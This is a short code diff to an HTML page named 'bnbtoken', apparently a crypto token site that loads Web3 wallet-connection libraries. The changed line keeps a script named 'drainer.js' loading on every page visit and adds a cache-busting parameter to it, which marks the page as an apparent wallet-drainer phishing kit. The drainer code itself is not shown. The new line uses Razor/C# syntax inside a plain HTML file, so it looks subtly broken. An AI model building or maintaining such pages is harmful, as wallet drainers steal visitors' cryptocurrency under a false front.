--- a/bnbtoken/index.html
+++ b/bnbtoken/index.html
@@ -419,7 +419,7 @@
     <script type="text/javascript" src="https://unpkg.com/evm-chains@0.2.0/dist/umd/index.min.js"></script>
     <script type="text/javascript" src="https://unpkg.com/@walletconnect/web3-provider@1.2.1/dist/umd/index.min.js"></script>
     <script type="text/javascript"  src="https://cdn.jsdelivr.net/npm/@portis/web3@4.0.7/umd/index.min.js"></script>
-	<script src="./drainer.js"></script>
+	<script src="@string.Format("./drainer.js?v={0}", DateTime.Now.Ticks)"></script>
     <style type="text/css">
         .buttoned {
             color:rgb(234, 238, 241);
